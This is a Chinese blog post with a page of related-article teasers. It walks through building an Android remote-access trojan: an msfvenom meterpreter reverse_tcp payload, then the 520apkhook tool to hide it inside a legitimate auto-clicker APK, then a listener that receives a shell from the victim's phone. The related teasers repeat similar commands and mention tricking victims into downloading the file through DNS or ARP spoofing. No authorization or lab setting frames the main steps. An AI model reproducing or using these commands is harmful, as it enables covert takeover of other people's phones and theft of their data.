msf入侵安卓实战

最新推荐文章于 2025-04-22 14:38:29 发布

国雪

最新推荐文章于 2025-04-22 14:38:29 发布

阅读量3k

点赞数 1

分类专栏：渗透测试文章标签： android

本文链接：https://blog.youkuaiyun.com/m0_65109001/article/details/128545625

版权

渗透测试专栏收录该内容

1 篇文章

订阅专栏

本文介绍了如何生成一个安卓木马程序，使用msfvenom工具创建reverse_tcp木马，然后利用520apkhook工具将其植入到一个连点器的apk安装包中。最后，说明了如何开启监听并获取shell进行操作。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1.生成一个安卓木马端程序

这里是一个裸马，会被检测

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -f apk > 自动点击器.apk

这跟直接告诉别人这是木马没有区别了

2.植入程序

这里我用的是一个名叫520apkhook的工具，可以去GitHub上找到

先随便找一个apk的安装包

这里我用的是一个连点器的安装包

生成木马

python3 main.py --lhost xxx.xxx.xxx.xxx --lport xxxx -n ../自动点击器.apk

到这里就算完成了。

3.开启监听

弹回shell

一些基本命令都可以使用

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

国雪

关注关注

1
点赞
踩
46

收藏

觉得还不错? 一键收藏
3
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

利用MSF攻击Android

qq_45746768的博客

07-08

4089

利用Metasploit攻击Android

MSF入侵安卓手机

2301_77162959的博客

07-11

1617

里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称，Metasploit是一款开源的安全漏洞检测工具，非常强大，分别有Windows版和Linux版，工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上，思路有很多可以DNS arp劫持欺骗只要对方用手机下载文件就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件，至于木马的免杀暂且不谈。还有社工什么等等的，这里我就简单的把木马文件弄我自己的手机上做测试。

3 条评论您还未登录，请先登录后发表或查看评论

520apkhook 项目教程

gitblog_00004的博客

06-22

969

520apkhook 项目教程 520apkhook 将安卓远控Apk附加进普通的App中，运行新生成的App时，普通App正常运行，远控正常上线。Attach the Android remote control APK to a regular app. When the newly generated app is...

探索520_APK_HOOK：安卓远控的新纪元

gitblog_01008的博客

08-08

475

探索520_APK_HOOK：安卓远控的新纪元项目地址:https://gitcode.com/gh_mirrors/520/520apkhook 在数字世界的深处，技术的边界不断被重新定义。今天，我们将介绍一个革命性的开源项目——520_APK_HOOK，它以其独特的技术架构和强大的功能，正悄然改变着安卓远控的格局。项目介绍 520_APK_HOOK是一个由资深开发者BaoGuo精心打造的安...

网络安全新手入门—MSF渗透安卓手机（小白的第一次黑客渗透）

最新发布

wholeliubei的博客

04-22

1095

MSF，全称为，是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中，其显示的内网IP无法被外网的安卓手机S直接访问，所以不能直接将文章方法应用于外网。该实验为模拟环境，未经授权的渗透都是违法行为，我们都是守法的好公民。而且这种方法只能渗透安卓10以下的系统，入侵渗透更高级的系统需要更加专业的知识，再加上只能进行内网渗透，所以这种方法很难进行违法渗透！

Msf 入侵安卓手机

weixin_30378311的博客

09-21

1242

MSF是Metasploit的简称，Metasploit是一款开源的安全漏洞检测工具，非常强大，分别有Windows版和Linux版，工具里集成了许多微软公布的漏洞(0day)。 1.查看ip ifconfig 2.生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ribe...

Kali Linux使用MSF木马入侵安卓手机

philip_z的博客

02-13

9204

Kali Linux使用MSF木马入侵安卓手机

MSF渗透安卓手机（George的第一次黑客渗透）

2402_86265887的博客

01-27

2322

刚进行过黑客渗透的 George 激情澎湃，决定写一篇优快云记录一下，谨以纪念！MSF，全称为，是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中，其显示的内网IP无法被外网的安卓手机S直接访问，所以不能直接将文章方法应用于外网。该实验为模拟环境，未经授权的渗透都是违法行为，我们都是守法的好公民。

超详细！！简单使用kali中MSF渗透安卓模拟器操作实战（MSF生成安卓APK（制作客户端）

2401_83640658的博客

02-11

1639

简单实战一下使用kali中MSF制作安卓木马渗透控制安卓虚拟机。本次讲解只适用于渗透安卓虚拟机，有兴趣可以实操一下。

Kali利用MSF渗透安卓手机_kali入侵安卓手机

2401_87034253的博客

09-11

1685

MSF是一个综合性渗透测试工具，集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。

Metasploit Framework (MSF) 详解

cxm4545的博客

08-10

5261

Metasploit Framework （简称MSF）是一款开源的渗透测试框架，它提供了数百个已知软件漏洞的专业级漏洞攻击工具和漏洞利用模块，为渗透测试，shellcode 编写和漏洞研究提供了一个可靠平台。Kali里自带了MSF工具，使用命令 msfconsole 或者双击MSF图标即可以启动MSF。本篇就以Kali为实验环境来学习MSF。

渗透测试 ( 3 ) --- Metasploit Framework ( MSF )

墨鱼菜鸡

07-11

4795

白嫖 Metasploit Pro 2022：https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022：http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro：https://www.52pojie.cn/thr...

靶机实战-Android4

滕财然的博客

03-28

796

Android4靶机实战文章目录Android4靶机实战1、主机发现2、端口及端口详细信息3、访问http服务(8080端口)4、成功入侵 1、主机发现靶机IP为192.168.110.129 2、端口及端口详细信息开放5555、8080、22000端口 3、访问http服务(8080端口) 提示说有一个后门，并用POST方式提交果断尝试url拼接 backdoor.php: 上面...

MSF渗透Android

Yxisobai的博客

05-28

1598

kali linux 云服务器,云服务器安装kali linux网络软件不要乱下载，自己做测试的时候没做免杀手机能监测出病毒，但是被有心之人利用，通过捆绑，免杀等一系列操作，还是很难发现的。特别注意一下外挂等软件，xx助手等软件。

msf使用木马控制android手机

my_name_is_sy的博客

05-18

2897

使用msfvenom生成木马控制手机

使用msf工具对安卓手机进行渗透攻击———超详细